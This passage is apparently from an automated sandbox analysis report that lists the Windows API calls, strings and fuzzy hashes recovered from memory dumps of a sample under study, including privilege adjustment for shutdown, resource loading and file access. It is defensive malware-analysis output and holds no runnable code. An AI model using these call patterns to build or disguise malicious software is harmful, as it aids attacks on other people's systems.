                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                          APIs
                                                                          • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrev
                                                                          • String ID:
                                                                          • API String ID: 122130370-0
                                                                          • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                          • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                          • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                          • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                          • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                          • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                          • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                          • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                          • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                          • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                          • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                          • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                          • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                          • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                          • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                          • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                          • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                          • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                          • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                          • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: SystemTime
                                                                          • String ID:
                                                                          • API String ID: 2656138-0
                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                          • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                          • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                          • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                          • LocalFree.KERNEL32(005DF6A0,00000000,00401AB4), ref: 00401A1B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,005DF6A0,00000000,00401AB4), ref: 00401A3A
                                                                          • LocalFree.KERNEL32(005E06A0,?,00000000,00008000,005DF6A0,00000000,00401AB4), ref: 00401A79
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                          • API String ID: 1220098344-1503883590
                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
